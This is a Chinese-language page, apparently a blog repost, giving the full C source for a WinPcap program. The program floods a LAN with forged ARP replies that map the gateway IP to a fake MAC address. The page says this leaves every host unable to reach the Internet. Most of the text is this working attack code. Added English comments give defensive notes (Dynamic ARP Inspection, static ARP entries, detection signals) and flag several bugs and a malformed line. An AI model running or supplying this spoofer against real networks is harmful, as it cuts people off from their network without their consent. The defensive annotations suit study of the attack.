ARP閘道器欺騙程式的實現(VS2008 + WinPcap)
阿新 • • 發佈:2019-02-16
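程式向區域網廣播偽造的ARP應答包,讓區域網內所有主機把閘道器IP對應到錯誤的MAC地址。多數主機會接受未經請求的ARP應答並更新自己的ARP快取,之後發往閘道器的流量就送到錯誤的地址,因此所有計算機都不能上網。在交換機上啟用動態ARP檢測(Dynamic ARP Inspection),或在主機上為閘道器設定靜態ARP條目,可以阻止這類偽造應答生效。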
原始碼
環境:Windows XP、VS2008,需安裝 WinPcap
開發包:WinPcap
字符集:ASCII
/*
 * ARP gateway-spoofing demo (WinPcap Packet32 API), reproduced from the page.
 *
 * What the code does: it builds one Ethernet frame carrying an ARP *reply*
 * that claims the gateway IP 114.213.68.1 is at MAC 28:C0:DA:06:EC:88 (the
 * page marks this MAC as fake), addresses it to the Ethernet broadcast
 * address, and sends it in an endless loop on the adapter the user picks.
 * The page states the effect: hosts on the LAN can no longer reach the
 * Internet.
 *
 * Defender notes:
 *  - The Ethernet source MAC (..:EC:84) differs from the ARP sender MAC
 *    (..:EC:88). A mismatch between the frame source and the ARP sender
 *    hardware address is a classic signal for ARP-inspection tooling.
 *  - The traffic is a continuous stream of unsolicited ARP replies sent to
 *    broadcast for the gateway's IP; a gateway IP whose MAC suddenly changes
 *    or flaps is what ARP-watch style monitoring alerts on.
 *  - Dynamic ARP Inspection on the switch, or a static ARP entry for the
 *    gateway on hosts, keeps such replies from taking effect.
 */
#define WINVER 0x5001 // win xp (per the page; NOTE(review): Windows XP is normally 0x0501)
#define HAVE_REMOTE
#include <stdio.h>
#include <pcap.h>
#include <Packet32.h>
#include <windows.h>
#include <shlwapi.h>
#pragma comment(lib,"shlwapi.lib")
#pragma comment(lib,"wpcap.lib")
#pragma comment(lib,"Packet.lib")
#define EPT_IP 0x0800 // EtherType: IP
#define EPT_ARP 0x0806 // EtherType: ARP
#define EPT_RARP 0x8035 // EtherType: RARP
// NOTE(review): as printed on the page, the text after 0x0001 on the next
// line is not inside a comment (it reads like "802.3 Ethernet" with one
// slash missing). The line is reproduced exactly as the page shows it.
#define ARP_HARDWARE 0x0001/802.3 乙太網
#define ARP_REQUEST 0x0001 // ARP request opcode
#define ARP_REPLY 0x0002 // ARP reply opcode
#define Max_Num_Adapter 10
#pragma pack(push, 1)
// Ethernet header, packed to 1-byte alignment so it matches the wire layout.
typedef struct ehhdr {
    unsigned char eh_dst[6]; // destination MAC address
    unsigned char eh_src[6]; // source MAC address
    unsigned short eh_type; // frame type (EtherType)
} EHHDR, *PEHHDR;
// ARP header for Ethernet/IPv4, packed to 1-byte alignment.
typedef struct arphdr {
    unsigned short arp_hrd; // hardware type
    unsigned short arp_pro; // protocol type
    unsigned char arp_hln; // hardware address length (6)
    unsigned char arp_pln; // protocol address length (4)
    unsigned short arp_op; // ARP/RARP operation
    unsigned char arp_sha[6]; // sender MAC
    unsigned long arp_spa; // sender IP
    unsigned char arp_tha[6]; // target MAC
    unsigned long arp_tpa; // target IP
}ARPHDR, *PARPHDR;
// Convert a 12-hex-digit MAC string (no separators) into 6 raw bytes.
//   MacAddr: text such as "FFFFFFFFFFFF"; exactly 12 characters are read.
//   pbuff:   receives the 6 converted bytes.
// NOTE(review): the StrToIntEx return value is ignored, so n is used
// uninitialized if a digit pair fails to parse; the input length is not checked.
void GetMacAddr(char *MacAddr,unsigned char *pbuff) {
    char temp[5]="0x\0\0"; // "0x" prefix followed by room for two hex digits and the terminator
    char *temp_1=temp+2; // points just past the "0x" prefix
    int n;
    for(int i=0;i<12;i+=2) {
        memcpy(temp_1,MacAddr,2); // temp now reads "0xHH"
        StrToIntEx(temp,STIF_SUPPORT_HEX,&n);
        pbuff[i/2]=(unsigned char)n;
        MacAddr+=2;
    }
}
// Complete frame: Ethernet header immediately followed by the ARP header.
typedef struct arpPacket {
    EHHDR ehhdr;
    ARPHDR arphdr;
} ARPPACKET, *PARPPACKET;
#pragma pack(pop)
// Entry point: list adapters, let the user pick one, build the forged ARP
// reply described in the file header, and send it in an endless loop.
// Returns 0 when the adapter list cannot be read, 1 when the adapter cannot
// be opened, 2 when packet allocation fails, 3 when a send fails.
int main() {
    static char AdapterList[Max_Num_Adapter][1024];
    char szPacketBuf[600];
    LPADAPTER lpAdapter;
    LPPACKET lpPacket;
    char AdapterName[2048];
    char *temp, *temp1;
    ARPPACKET ARPPacket;
    ULONG AdapterLength = 1024; // NOTE(review): smaller than the 2048-byte AdapterName buffer it describes
    int AdapterNum = 0;
    int nRetCode, i;
    // Get the adapter list
    if (PacketGetAdapterNames(AdapterName, &AdapterLength) == FALSE) {
        printf("不能獲得介面卡列表!\n");
        return 0;
    }
    // Split the adapter names: the loop treats the buffer as NUL-separated
    // strings and stops at two consecutive NUL bytes.
    // NOTE(review): on the first iteration *(temp - 1) reads one byte before
    // AdapterName, and i is never checked against Max_Num_Adapter, so more
    // than 10 names would write past AdapterList.
    temp = AdapterName;
    temp1 = AdapterName;
    i = 0;
    while ((*temp != '\0') || (*(temp - 1) != '\0')) {
        if (*temp == '\0') {
            // No terminator is copied; the static array is zero-initialized.
            memcpy(AdapterList[i], temp1, (temp - temp1));
            temp1 = temp + 1;
            i++;
        }
        temp++;
    }
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
        printf("\n%d- %s\n", i + 1, AdapterList[i]);
    printf("請輸入介面卡的序號:");
    int nSelect;
    // NOTE(review): the scanf result is not checked and nSelect is not
    // range-checked, so AdapterList[nSelect-1] can index out of bounds.
    scanf("%d",&nSelect);
    // Open the adapter
    lpAdapter = (LPADAPTER)PacketOpenAdapter(AdapterList[nSelect-1]);
    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) {
        nRetCode = GetLastError();
        // NOTE(review): nRetCode is an int but is printed with %lx.
        printf("不能開啟驅動,錯誤碼為: %lx\n", nRetCode);
        return 1;
    }
    // Allocate the packet structure
    lpPacket=PacketAllocatePacket();
    if (lpPacket == NULL) {
        printf("錯誤:分配包記憶體空間失敗!\n");
        return 2;
    }
    ZeroMemory(szPacketBuf, sizeof(szPacketBuf));
    GetMacAddr("28C0DA06EC84",ARPPacket.ehhdr.eh_src); // Ethernet source MAC
    GetMacAddr("FFFFFFFFFFFF",ARPPacket.ehhdr.eh_dst); // Ethernet broadcast
    ARPPacket.ehhdr.eh_type=htons(EPT_ARP);
    ARPPacket.arphdr.arp_hrd=htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro=htons(EPT_IP);
    ARPPacket.arphdr.arp_hln=6;
    ARPPacket.arphdr.arp_pln=4;
    ARPPacket.arphdr.arp_op=htons(ARP_REPLY);
    GetMacAddr("28C0DA06EC88",ARPPacket.arphdr.arp_sha); // sender MAC, fake (differs from the Ethernet source MAC above)
    ARPPacket.arphdr.arp_spa=inet_addr("114.213.68.1"); // gateway IP
    GetMacAddr("FFFFFFFFFFFF",ARPPacket.arphdr.arp_tha); // broadcast MAC
    ARPPacket.arphdr.arp_tpa=inet_addr("255,255,255,255"); // commented on the page as the broadcast IP; the literal uses commas, reproduced as printed
    memcpy(szPacketBuf, (char*) &ARPPacket, sizeof(ARPPacket));
    // 60 bytes are handed to the driver; the bytes after the copied struct
    // are the zeros left by ZeroMemory above.
    PacketInitPacket(lpPacket, szPacketBuf, 60); // initialize the packet
    // Presumably sets how many times each write is repeated (see the WinPcap
    // Packet.dll documentation); a failure only prints a warning.
    if (PacketSetNumWrites(lpAdapter, 2) == FALSE) {
        printf("警告: Unable to send more than one packet in a single write ! \n ");
        getchar();
    }
    // Send the spoofed ARP reply continuously. The loop has no exit other
    // than the error return, so the statements after it are never reached
    // and the packet and adapter are not released on the return-3 path.
    while(true){
        if (PacketSendPacket(lpAdapter, lpPacket, TRUE) == FALSE) {
            printf("Error sending the packets!\n");
            getchar();
            return 3;
        }
    }
    printf("Send ok!\n");
    // Free the packet, close the adapter and exit
    PacketFreePacket(lpPacket);
    PacketCloseAdapter(lpAdapter);
    scanf("%d",&i);
    return 0;
}